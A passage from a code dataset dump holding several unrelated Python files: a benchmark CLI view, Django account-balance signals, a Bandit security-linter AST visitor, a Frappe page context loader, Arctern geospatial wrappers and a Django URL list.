Color.GREEN.value\n ye = Color.YELLOW.value\n en = Color.END.value\n reference = f\"GOAL={goal}, MIN={minimum}\"\n line_prefix = \"\".join([\" \" for _ in range(indent)]) + line_prefix\n name_cut = name[:name_len - 3 - len(reference) - len(line_prefix)] + \\\n \"...\" if len(name + reference) > name_len else name\n spaces = \"\".join(\".\" for _ in range(\n name_len - len(name_cut + reference + line_prefix)))\n label = line_prefix + name_cut + \", \" + spaces + reference\n label = label.replace(\"GOAL\", f\"{gr}GOAL{en}\")\n label = label.replace(\"MIN\", f\"{ye}MIN{en}\")\n return label\n\n\ndef _prepare_bars(goal: float,\n value: float,\n color: Color,\n width: int) -> str:\n length = round(width * (value / goal))\n if length > width:\n length = width\n elif length < 1:\n length = 1\n blocks = \"\".join([\"\\u2588\" for _ in range(length)])\n space = \"\".join([\" \" for _ in range(width - length)])\n return f\"{color.value}{blocks}{Color.END.value}{space}\"\n\n\ndef _prepare_directory(file: str):\n \"\"\"Prepare the directory where the profile files will be saved in.\"\"\"\n if not os.path.exists(os.path.dirname(file)):\n try:\n os.makedirs(os.path.dirname(file))\n except OSError as exc: # Guard against race condition\n if exc.errno != errno.EEXIST:\n raise\n\n\ndef _get_bar_color(result: \"UseCaseResult\") -> Color:\n if result.failed:\n return Color.END\n ops_ps = result.operations_per_second\n goal = result.goal_operations_per_second\n minimum = result.minimum_operations_per_second\n tolerance = result.operations_per_second_tolerance\n if ops_ps + minimum * tolerance < minimum:\n return Color.RED\n elif ops_ps + goal * tolerance < goal:\n return Color.YELLOW\n else:\n return Color.GREEN\n\n\ndef _get_cleaned(stats,\n filtered_packages: Optional[List] = None,\n filter_system_calls: bool = False):\n \"\"\"\n To make the profiler stats easier to read, we want to filter out:\n 1. Code from Site Packages\n 2. Code belonging to the widgetmark Framework\n\n Template for the filter was the project:\n https://github.com/w0rp/filter-profiler-results\n\n Args:\n stats:\n\n Returns:\n Cleaned version of the passed stats\n \"\"\"\n name_filter: List[Union[str, Pattern]] = []\n if filtered_packages is None:\n filtered_packages = []\n for package in filtered_packages:\n name_filter += _find_modules(package)\n if filter_system_calls:\n name_filter.append(re.compile(r\"~||\"))\n filtered_stats = {\n key: (nc, cc, tt, ct, {\n caller_key: timing_tuple\n for caller_key, timing_tuple in\n callers.items()\n if should_include_stats(caller_key, name_filter)\n })\n for key, (nc, cc, tt, ct, callers) in stats.stats.items()\n if should_include_stats(key, name_filter)\n }\n return filtered_stats\n\n\ndef should_include_stats(stats_key, filename_filters):\n filename, line_number, symbol = stats_key\n for f in filename_filters:\n if isinstance(f, str) and f in filename:\n return False\n elif hasattr(f, \"match\") and re.match(f, filename):\n return False\n return True\n\n\ndef widget_mark_install_path() -> List[str]:\n \"\"\"Get the path where the package widget-mark was installed to.\"\"\"\n import widgetmark\n return widgetmark.__path__ # type: ignore # mypy issue #1422\n\n\ndef _find_modules(path: str):\n \"\"\"Find all modules of a package.\"\"\"\n modules = set()\n for pkg in find_packages(path):\n for info in iter_modules([os.path.join(path, pkg.replace(\".\", \"/\"))]):\n if not info.ispkg:\n modules.add(os.path.join(pkg, info.name))\n return modules\n","sub_path":"widgetmark/cli/cli_view.py","file_name":"cli_view.py","file_ext":"py","file_size_in_byte":14747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"306185293","text":"from django.contrib.auth.models import User\nfrom .models import Movements, Account_value\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_save, post_delete, post_init\n\n# presave_move_to_account = int()\n# @receiver(post_init, sender=Movements)# this decorator gives me the info before saving\n# def save_to_global(sender, instance, **kwargs):# instance is the sender objet(Movement)\n# print(\"getting in post_init\")\n# global presave_move_to_account \n# presave_move_to_account = instance.move_to_account\n# print(presave_move_to_account)\n\n@receiver(post_save, sender=Movements)#<-this decorator waits until new movement is created to aply account_value update\ndef payment(sender, instance, created, **kwargs):# instance is the sender objet(Movement)\n \"\"\"function for editing a table field after post from a different table\n in this function after adding a new movement is automatically sent the \n signal for updating the account´s related account_value field calculating \n the the current amount after paying or receiving money\n \"\"\"\n if created:\n editor = Account_value.objects.get(id=instance.account_id.id)#instance.this_table_field.foreign_key_field\n instance.account_value_before = editor.account_value\n editor.account_value += instance.amount\n instance.account_value_after = editor.account_value\n editor.save()\n save_without_signal(instance)\n if instance.move_to_account:#Here if we are moving we update the second account. HINT: Move to account is saved as string\n movement_in_second_account(instance, created)\n instance.move_to_account_prestate = True #To know was a movement o not before save we use this function and update it here\n save_without_signal(instance)\n else: #For editing case\n account_value_tmp = update_current_movement(instance, created)\n update_recursively_movements(instance, account_value_tmp)\n \n\n@receiver(post_delete, sender=Movements)\ndef undo_payment(sender, instance, **kwargs):\n print(\"getting in post delete receiver\")\n editor = Account_value.objects.get(id=instance.account_id.id)# ACCOUNT moving the money object\n editor.account_value -= instance.amount#Calculate the new account value\n \n try:#Here we create automatically the movement in the second account if we are moving money.\n #If we get and error at creating the second account movement the first movement is gonna be created anyway, \n #Because of that when deleting that first movement we need to catch the error of second account movement not found\n update_recursively_movements(instance, account_value_tmp=instance.account_value_before)\n if instance.move_to_account:#Here if we are moving we update the second account. HINT: Move to account is saved as string\n movement_in_second_account(instance)\n print(\"second account id is: \",instance)\n linked_movement = Movements.objects.get(id = instance.second_account_movement_id)\n delete_without_signal(linked_movement)\n except:\n pass\n\n editor.save()\n\n\n#-----------Functions for signals------------------------\n\ndef update_current_movement(instance, created):\n #Update the amount, account_value_before and account_value_after\n\n # instance = Movements.objects.get(id=instance.id)#get the object of the current movement\n editor = Account_value.objects.get(id=instance.account_id.id)#the second account\n previous_amount = instance.account_value_after - instance.account_value_before#before changing the account_value_before and after we get the previous amount\n editor.account_value -= previous_amount#Undo the previos movement in the account\n editor.account_value += instance.amount#Calculate the new account value if there was a movement\n if instance.move_to_account:#Here if we are moving we update the second account. HINT: Move to account is saved as string\n movement_in_second_account(instance, created, previous_amount)#Update the new amount in the moved to account\n instance.account_value_after = instance.account_value_before + instance.amount#Save the new account value in the movement for references\n account_value_tmp = instance.account_value_after\n editor.save()\n save_without_signal(instance)\n return account_value_tmp\n\n\ndef update_recursively_movements(instance, account_value_tmp):#Instance is the actual movement\n \"\"\"This function update in the rest of account movements the account_value_before and account_value_after variables \n for the account paying and the account receiving if it is the case. \n \n OTHER OPTION NOT WORKING WELL: In this case is not possible to only set if i.date > instance.date becouse when added movements\n from the admin the time can be exactly the same for some movements when we use 'save and add another' options\n so works better to allways skip the current edited movement.\n\n Args:\n instance (Django query object): [Takes the object of the current movement]\n account_value_tmp (int): the account_value_bejore or after depending of \n the accion, for editing its passed the account_value_after, for deleting its needed the account_value_before\n \"\"\"\n account_movements = Movements.objects.filter(account_id = instance.account_id.id)#get all the movements of the instanciated account(account moving)\n\n # account_value_tmp = int()\n for i in account_movements:#Update the movements for the rest of movements in the moving account\n if i.id > instance.id:#skip all the previous movements including the actual\n print(\"editting\", i)\n i.account_value_before = account_value_tmp\n i.account_value_after = account_value_tmp + i.amount\n account_value_tmp = i.account_value_after\n save_without_signal(i)\n \n if instance.move_to_account:#Update the rest of the movements in the second account\n account_value_tmp = Movements.objects.get(id = instance.second_account_movement_id).account_value_after\n print(\"got in instance.move_to_acco1unt\")\n print(\"account value temp is:\", account_value_tmp)\n second_account_movements = Movements.objects.filter(account_id = instance.move_to_account)#get all the movements of the instanciated account(second account)\n print(second_account_movements)\n for i in second_account_movements:\n print(\"i id id:\", i.id)\n print(\"instance second account movement id is:\", instance.second_account_movement_id)\n if i.id > instance.second_account_movement_id:#skip all the previous movements including the actual of the second account\n print(\"editting\", i)\n i.account_value_before = account_value_tmp\n i.account_value_after = account_value_tmp + i.amount\n account_value_tmp = i.account_value_after\n save_without_signal(i)\n \n\n \n\n\ndef save_without_signal(instance):\n \"\"\"Hack to avoid save method from sending a signalcreating a recursive error \n EXPLANATION: \n If you look at the django model source code, specifically save_base(), \n you'll see that the pre_save() and post_save() signals are both wrapped in a conditional:\n We can directly manipulate the meta options of a model or instance through\n the _meta API which means we're able to 'disable' the signals from firing by setting \n auto_created = True on the instance we want to save.\n \"\"\"\n instance._meta.auto_created = True\n instance.save()\n instance._meta.auto_created = False\n\ndef delete_without_signal(instance):\n instance._meta.auto_created = True\n instance.delete()\n instance._meta.auto_created = False\n\n\n\ndef movement_in_second_account(instance, created=None, previous_amount=0):\n \"\"\"Here if we are moving we update the second account. HINT: Move to account is saved as string\n\n Args:\n instance (Queryset object): [is the object of the movement the user is operating with]\n created ([Boolean], optional): [description]. Defaults to None to implement delete statement.\n previous_amount ([Int], optional): [description]. Defaults to 0. This is a necessary variable for editing \n \"\"\"\n account_receiving = Account_value.objects.get(id = instance.move_to_account)\n if created:#For creating\n print(\"getting in movement_in_second_account created\")\n account_receiving.account_value -= instance.amount\n \n elif created == False:#For editing\n if instance.move_to_account_prestate:\n print(\"updating when there was allready a movement\")\n print(\"previous amount \", previous_amount)\n print(\"instance amount \", instance.amount)\n account_receiving.account_value += previous_amount#Undo the previos movement in the account\n account_receiving.account_value -= instance.amount#Calculate the new account value\n else:\n print(\"Update when there was not a movement\")\n account_receiving.account_value -= instance.amount#update the second own account\n else:#For deleting\n print(\"getting in movement_in_second_account deleted\")\n account_receiving.account_value += instance.amount#Undo the previos movement in the account\n second_account_movement(instance, created, account_receiving)\n account_receiving.save()\n \n\n\ndef second_account_movement(instance, created, account_receiving):#Instance: movement moving the money. account_receiving: the money receiver account\n #Here we create, edit only the movement done in the second account, re rest of movements are updated in the update_recursively_movements function\n # instance = Movements.objects.get(id=instance.id)#the account moving the money\n # account_receiving = Account_value.objects.get(id=instance.move_to_account)#the account receiving the money\n def create(instance, account_receiving):\n movement_info = Movements()\n movement_info.account_id = account_receiving\n movement_info.date = instance.date\n movement_info.amount = instance.amount * -1\n movement_info.moved_from_account = instance.account_id.id\n movement_info.message = instance.message\n movement_info.account_value_before = account_receiving.account_value + instance.amount #we use plus because instance.amount is a negative number\n print(account_receiving.account_value,\"....\", instance.amount)\n movement_info.account_value_after = account_receiving.account_value\n movement_info.move_to_account_prestate = True\n print(\"movement info id is: \" ,movement_info.id, type(movement_info.id))\n movement_info.second_account_movement_id = instance.id\n save_without_signal(movement_info)\n instance.second_account_movement_id = movement_info.id#Update the field in the instance after create the second account movement.\n #We dont need to save it here becouse is saved in future step. If we do it here we create it twice\n if created:\n create(instance, account_receiving)\n elif created == False:\n if instance.move_to_account_prestate:#We update here the date, amount and message. \n #If idea is to send the money to another account user have to delete and create a new movement\n update_the_second_account = Movements.objects.get(id=instance.second_account_movement_id)\n update_the_second_account.date = instance.date\n update_the_second_account.amount = instance.amount * -1\n update_the_second_account.message = instance.message\n update_the_second_account.account_value_after = update_the_second_account.account_value_before + update_the_second_account.amount\n save_without_signal(update_the_second_account)\n else:#user cant edit a payment to make it a movement, this option is only allowed from admin panel\n create(instance, account_receiving)\n else:#for deleting, done directly in the post_delete signal.\n pass\n\n\n\n\n\n\n","sub_path":"accounts/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":12116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"576036566","text":"#!/usr/bin/env python\n\nimport sys\nimport ast, _ast\nimport copy\nfrom bandit import tester as b_tester\nfrom bandit import utils as b_utils\n\nclass BanditNodeVisitor(ast.NodeVisitor):\n\n imports = set()\n import_aliases = {}\n qualname = \"\"\n calldone = False\n logger = None\n results = None\n tester = None\n testset = None\n fname = None\n depth = 0\n\n context = None\n context_template = {'node': None, 'filename': None, 'lineno': None,\n 'name': None, 'qualname': None, 'module': None,\n 'imports': None, 'import_aliases': None, 'call': None}\n\n def __init__(self, fname, logger, metaast, results, testset):\n self.seen = 0\n self.fname = fname\n self.logger = logger\n self.metaast = metaast\n self.results = results\n self.testset = testset\n self.imports = set()\n self.context_template['imports'] = self.imports\n self.import_aliases = {}\n self.context_template['import_aliases'] = self.import_aliases\n self.tester = b_tester.BanditTester(self.logger, self.results, self.testset)\n\n def visit_Call(self, node):\n self.context['lineno'] = node.lineno\n if self.qualname == \"\":\n self.qualname = b_utils.get_call_name(\n node, self.import_aliases)\n self.context['call'] = node\n\n # nested calls\n if type(node.func) == _ast.Attribute:\n if type(node.func.value) == _ast.Call:\n self.qualname = \".\".join([b_utils.get_call_name(\n node.func.value, self.import_aliases), self.qualname])\n else:\n self.calldone = True\n else:\n self.calldone = True\n\n # fill in our context\n if self.qualname is not None:\n self.context['qualname'] = self.qualname\n self.context['name'] = self.qualname.split('.')[-1]\n\n # done with nested\n if (self.calldone):\n self.logger.debug(\"PARSED COMPLETE qualname: %s\" % self.qualname)\n self.logger.debug(\"\\tBASENODE: %s\" % ast.dump(self.context['call']))\n self.qualname = \"\"\n self.calldone = False\n self.tester.run_tests(self.context, 'Call')\n super(BanditNodeVisitor, self).generic_visit(node)\n\n def visit_Import(self, node):\n self.context['lineno'] = node.lineno\n self.logger.debug(\"visit_Import called (%s)\" % ast.dump(node))\n for nodename in node.names:\n if nodename.asname:\n self.context['import_aliases'][nodename.asname] = nodename.name\n self.context['imports'].add(nodename.name)\n self.context['module'] = nodename.name\n self.tester.run_tests(self.context, 'Import')\n super(BanditNodeVisitor, self).generic_visit(node)\n\n def visit_ImportFrom(self, node):\n self.context['lineno'] = node.lineno\n module = node.module\n if module is None:\n return self.visit_Import(node)\n for nodename in node.names:\n if nodename.asname:\n self.context['import_aliases'][nodename.asname] = module + \".\" + nodename.name\n self.context['imports'].add(module + \".\" + nodename.name)\n self.context['module'] = module\n self.context['name'] = nodename.name\n self.tester.run_tests(self.context, 'ImportFrom')\n super(BanditNodeVisitor, self).generic_visit(node)\n\n def visit(self, node):\n self.logger.debug(ast.dump(node))\n self.metaast.add_node(node, '', self.depth)\n self.context = copy.copy(self.context_template)\n self.context['node'] = node\n self.context['filename'] = self.fname\n self.seen += 1\n self.logger.debug(\"entering: %s %s [%s]\" % (hex(id(node)), type(node), self.depth))\n self.depth += 1\n super(BanditNodeVisitor, self).visit(node)\n self.depth -= 1\n self.logger.debug(\"%s\\texiting : %s\" % (self.depth, hex(id(node))))\n\n","sub_path":"bandit/node_visitor.py","file_name":"node_visitor.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"177886178","text":"from __future__ import unicode_literals\r\nimport frappe\r\n\r\ndef get_context(context):\r\n\t#body\r\n\t#---------------\r\n\t# -->Background-Image\r\n\tcontext.bodyimage = False\r\n\tif frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'bg_select' AND doctype = 'Body Settings'\", as_dict=True)[0].value == \"Image\":\r\n\t\tcontext.bodyimage = True\r\n\t\tcontext.bodyimagesource = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'bg_img' AND doctype = 'Body Settings'\", as_dict=True)\r\n\t\t\r\n\t# -->Background-Color\r\n\tcontext.bodycolor = False\r\n\tif frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'bg_select' AND doctype = 'Body Settings'\", as_dict=True)[0].value == \"Color\":\r\n\t\tcontext.bodycolor = True\r\n\t\tcontext.bodycolorcode = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'bg_color' AND doctype = 'Body Settings'\", as_dict=True)\r\n\t\t\r\n\t#navbar\r\n\t#---------------------\r\n\tcontext.navbar = True\r\n\tcontext.nav_bg_color = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'nav_bg_color' AND doctype = 'Navbar'\", as_dict=True)[0].value\r\n\tcontext.nav_txt_color = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'nav_txt_color' AND doctype = 'Navbar'\", as_dict=True)[0].value\r\n\tcontext.navlinks = frappe.db.sql(\"SELECT title, link FROM `tabNavbar Item` WHERE parent = 'Navbar' ORDER BY idx ASC\", as_dict=True)\r\n\t\r\n\t#footer\r\n\t#-------------------\r\n\tcontext.footer = True\r\n\tcontext.footer_bg_color = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'footer_bg_color' AND doctype = 'PageMaster Footer'\", as_dict=True)[0].value\r\n\tcontext.footer_txt_color = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'footer_txt_color' AND doctype = 'PageMaster Footer'\", as_dict=True)[0].value\r\n\tcontext.txt = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'txt' AND doctype = 'PageMaster Footer'\", as_dict=True)[0].value\r\n\tcontext.link_title = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'link_title' AND doctype = 'PageMaster Footer'\", as_dict=True)[0].value\r\n\tcontext.link = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'link' AND doctype = 'PageMaster Footer'\", as_dict=True)[0].value\r\n\t\t\r\n\t#timeline\r\n\t#-----------------------\r\n\tcontext.timeline = False\r\n\tif frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'incl_timeline' AND doctype = 'About Us'\", as_dict=True)[0].value == \"1\":\r\n\t\tcontext.timeline = True\r\n\t\ttimeline_parent = frappe.db.sql(\"SELECT value FROM `tabSingles`WHERE doctype = 'About Us' AND field = 'timeline'\", as_dict=True)[0].value\r\n\t\tcontext.timeline_intro = frappe.db.sql(\"SELECT timeline_intro FROM `tabTimeline Set` WHERE title = '\"+timeline_parent+\"'\", as_dict=True)[0].timeline_intro\r\n\t\tcontext.timelines = frappe.db.sql(\"SELECT year, highlight, align FROM `tabTimeline` WHERE parent = '\"+timeline_parent+\"' ORDER BY idx ASC\", as_dict=True)\r\n\t\t\r\n\t#cards\r\n\t#--------------------------\r\n\tcontext.card = False\r\n\tif frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'incl_cards' AND doctype = 'About Us'\", as_dict=True)[0].value == \"1\":\r\n\t\tcontext.card = True\r\n\t\tcard_parent = frappe.db.sql(\"SELECT value FROM `tabSingles`WHERE doctype = 'About Us' AND field = 'cards'\", as_dict=True)[0].value\r\n\t\tcontext.cards = frappe.db.sql(\"SELECT img_or_fa, card_fa, card_fa_size, link_linkedin, card_img, title, link_twitter, subtitle_1, subtitle_2, btn_link, link_facebook, btn_title FROM `tabPage Cards` WHERE parent = '\"+card_parent+\"' ORDER BY idx ASC\", as_dict=True)\r\n\t\t\r\n\t#introduction\r\n\tcontext.intro = frappe.db.sql(\"SELECT value FROM tabSingles WHERE field = 'introduction' AND doctype = 'About Us'\", as_dict=True)[0].value","sub_path":"pagemaster/www/aboutus.py","file_name":"aboutus.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"547430554","text":"# Copyright (C) 2019-2020 Zilliz. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n__all__ = [\n \"ST_Point\",\n \"ST_Intersection\",\n \"ST_IsValid\",\n \"ST_PrecisionReduce\",\n \"ST_Equals\",\n \"ST_Touches\",\n \"ST_Overlaps\",\n \"ST_Crosses\",\n \"ST_IsSimple\",\n \"ST_GeometryType\",\n \"ST_MakeValid\",\n \"ST_SimplifyPreserveTopology\",\n \"ST_PolygonFromEnvelope\",\n \"ST_Contains\",\n \"ST_Intersects\",\n \"ST_Within\",\n \"ST_Distance\",\n \"ST_Area\",\n \"ST_Centroid\",\n \"ST_Length\",\n \"ST_HausdorffDistance\",\n \"ST_ConvexHull\",\n \"ST_NPoints\",\n \"ST_Envelope\",\n \"ST_Buffer\",\n \"ST_Union_Aggr\",\n \"ST_Envelope_Aggr\",\n \"ST_Transform\",\n \"ST_CurveToLine\",\n \"ST_GeomFromGeoJSON\",\n \"ST_GeomFromText\",\n \"point_map\",\n \"point_map_wkt\",\n \"heat_map\",\n \"heat_map_wkt\",\n \"choropleth_map\",\n \"coordinate_projection\",\n]\n\n\n\nimport pyarrow as pa\nfrom . import arctern_core_\n\ndef ST_Point(x, y):\n arr_x = pa.array(x, type='double')\n arr_y = pa.array(y, type='double')\n rs = arctern_core_.ST_Point(arr_x, arr_y)\n return rs.to_pandas()\n\ndef ST_GeomFromGeoJSON(json):\n geo = pa.array(json, type='string')\n rs = arctern_core_.ST_GeomFromGeoJSON(geo)\n return rs.to_pandas()\n\ndef ST_GeomFromText(text):\n geo = pa.array(text, type='string')\n rs = arctern_core_.ST_GeomFromText(geo)\n return rs.to_pandas()\n\ndef ST_Intersection(left, right):\n arr_left = pa.array(left, type='string')\n arr_right = pa.array(right, type='string')\n rs = arctern_core_.ST_Intersection(arr_left, arr_right)\n return rs.to_pandas()\n\ndef ST_IsValid(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_IsValid(arr_geos)\n return rs.to_pandas()\n\ndef ST_PrecisionReduce(geos, precision):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_PrecisionReduce(arr_geos, precision)\n return rs.to_pandas()\n\ndef ST_Equals(left, right):\n arr_left = pa.array(left, type='string')\n arr_right = pa.array(right, type='string')\n rs = arctern_core_.ST_Equals(arr_left, arr_right)\n return rs.to_pandas()\n\ndef ST_Touches(left, right):\n arr_left = pa.array(left, type='string')\n arr_right = pa.array(right, type='string')\n rs = arctern_core_.ST_Touches(arr_left, arr_right)\n return rs.to_pandas()\n\ndef ST_Overlaps(left, right):\n arr_left = pa.array(left, type='string')\n arr_right = pa.array(right, type='string')\n rs = arctern_core_.ST_Overlaps(arr_left, arr_right)\n return rs.to_pandas()\n\ndef ST_Crosses(left, right):\n arr_left = pa.array(left, type='string')\n arr_right = pa.array(right, type='string')\n rs = arctern_core_.ST_Crosses(arr_left, arr_right)\n return rs.to_pandas()\n\ndef ST_IsSimple(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_IsSimple(arr_geos)\n return rs.to_pandas()\n\ndef ST_GeometryType(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_GeometryType(arr_geos)\n return rs.to_pandas()\n\ndef ST_MakeValid(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_MakeValid(arr_geos)\n return rs.to_pandas()\n\ndef ST_SimplifyPreserveTopology(geos, distance_tolerance):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_SimplifyPreserveTopology(arr_geos, distance_tolerance)\n return rs.to_pandas()\n\ndef ST_PolygonFromEnvelope(min_x, min_y, max_x, max_y):\n arr_min_x = pa.array(min_x, type='double')\n arr_min_y = pa.array(min_y, type='double')\n arr_max_x = pa.array(max_x, type='double')\n arr_max_y = pa.array(max_y, type='double')\n rs = arctern_core_.ST_PolygonFromEnvelope(arr_min_x, arr_min_y, arr_max_x, arr_max_y)\n return rs.to_pandas()\n\ndef ST_Contains(left, right):\n arr_left = pa.array(left, type='string')\n arr_right = pa.array(right, type='string')\n rs = arctern_core_.ST_Contains(arr_left, arr_right)\n return rs.to_pandas()\n\ndef ST_Intersects(left, right):\n arr_left = pa.array(left, type='string')\n arr_right = pa.array(right, type='string')\n rs = arctern_core_.ST_Intersects(arr_left, arr_right)\n return rs.to_pandas()\n\ndef ST_Within(left, right):\n arr_left = pa.array(left, type='string')\n arr_right = pa.array(right, type='string')\n rs = arctern_core_.ST_Within(arr_left, arr_right)\n return rs.to_pandas()\n\ndef ST_Distance(left, right):\n arr_left = pa.array(left, type='string')\n arr_right = pa.array(right, type='string')\n rs = arctern_core_.ST_Distance(arr_left, arr_right)\n return rs.to_pandas()\n\ndef ST_Area(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_Area(arr_geos)\n return rs.to_pandas()\n\ndef ST_Centroid(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_Centroid(arr_geos)\n return rs.to_pandas()\n\ndef ST_Length(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_Length(arr_geos)\n return rs.to_pandas()\n\ndef ST_HausdorffDistance(geo1, geo2):\n arr1 = pa.array(geo1, type='string')\n arr2 = pa.array(geo2, type='string')\n rs = arctern_core_.ST_HausdorffDistance(arr1, arr2)\n return rs.to_pandas()\n\ndef ST_ConvexHull(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_ConvexHull(arr_geos)\n return rs.to_pandas()\n\ndef ST_NPoints(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_NPoints(arr_geos)\n return rs.to_pandas()\n\ndef ST_Envelope(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_Envelope(arr_geos)\n return rs.to_pandas()\n\ndef ST_Buffer(geos, distance):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_Buffer(arr_geos, distance)\n return rs.to_pandas()\n\ndef ST_Union_Aggr(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_Union_Aggr(arr_geos)\n return str(rs[0])\n\ndef ST_Envelope_Aggr(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_Envelope_Aggr(arr_geos)\n return str(rs[0])\n\ndef ST_Transform(geos, src, dst):\n arr_geos = pa.array(geos, type='string')\n src = bytes(src, encoding=\"utf8\")\n dst = bytes(dst, encoding=\"utf8\")\n\n rs = arctern_core_.ST_Transform(arr_geos, src, dst)\n return rs.to_pandas()\n\ndef ST_CurveToLine(geos):\n arr_geos = pa.array(geos, type='string')\n rs = arctern_core_.ST_CurveToLine(arr_geos)\n return rs.to_pandas()\n\n\ndef point_map(xs, ys, conf):\n arr_x = pa.array(xs, type='uint32')\n arr_y = pa.array(ys, type='uint32')\n rs = arctern_core_.point_map(arr_x, arr_y, conf)\n return rs.buffers()[1].to_pybytes().hex()\n\ndef point_map_wkt(points, conf):\n array_points = pa.array(points, type='string')\n rs = arctern_core_.point_map_wkt(array_points, conf)\n return rs.buffers()[1].to_pybytes().hex()\n\ndef heat_map(x_data, y_data, c_data, conf):\n arr_x = pa.array(x_data, type='uint32')\n arr_y = pa.array(y_data, type='uint32')\n arr_c = pa.array(c_data, type='uint32')\n rs = arctern_core_.heat_map(arr_x, arr_y, arr_c, conf)\n return rs.buffers()[1].to_pybytes().hex()\n\n\ndef heat_map_wkt(points, c_data, conf):\n array_points = pa.array(points, type='string')\n\n if isinstance(c_data[0], float):\n arr_c = pa.array(c_data, type='double')\n else:\n arr_c = pa.array(c_data, type='int64')\n\n rs = arctern_core_.heat_map_wkt(array_points, arr_c, conf)\n return rs.buffers()[1].to_pybytes().hex()\n\ndef choropleth_map(wkt_data, count_data, conf):\n arr_wkt = pa.array(wkt_data, type='string')\n if isinstance(count_data[0], float):\n arr_count = pa.array(count_data, type='double')\n else:\n arr_count = pa.array(count_data, type='int64')\n rs = arctern_core_.choropleth_map(arr_wkt, arr_count, conf)\n return rs.buffers()[1].to_pybytes().hex()\n\ndef coordinate_projection(geos, top_left, bottom_right, height, width):\n arr_geos = pa.array(geos, type='string')\n src_rs1 = bytes(top_left, encoding=\"utf8\")\n dst_rs1 = bytes(bottom_right, encoding=\"utf8\")\n rs = arctern_core_.coordinate_projection(arr_geos, src_rs1, dst_rs1, height, width)\n return rs.to_pandas()\n","sub_path":"python/arctern/_wrapper_func.py","file_name":"_wrapper_func.py","file_ext":"py","file_size_in_byte":8641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"601118258","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^team$', views.team, name='team'),\n url(r'^quiz$', views.quiz, name='quiz'),\n url(r'^vacancies$', views.vacancies, name='vacancies'),\n url(r'^projects$', views.projects, name='projects'),\n\n url(r\"^quiz_start\", views.quiz_start, name='quiz_start'),\n url(r\"^quiz_process\", views.quiz_process, name='quiz_process'),\n url(r\"^quiz_finish\", views.quiz_finish, name='quiz_finish'),\n url(r'^useful_links', views.useful_links, name='useful_links'),\n url(r'^contact', views.contact, name='contact'),\n]\n","sub_path":"quiz/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
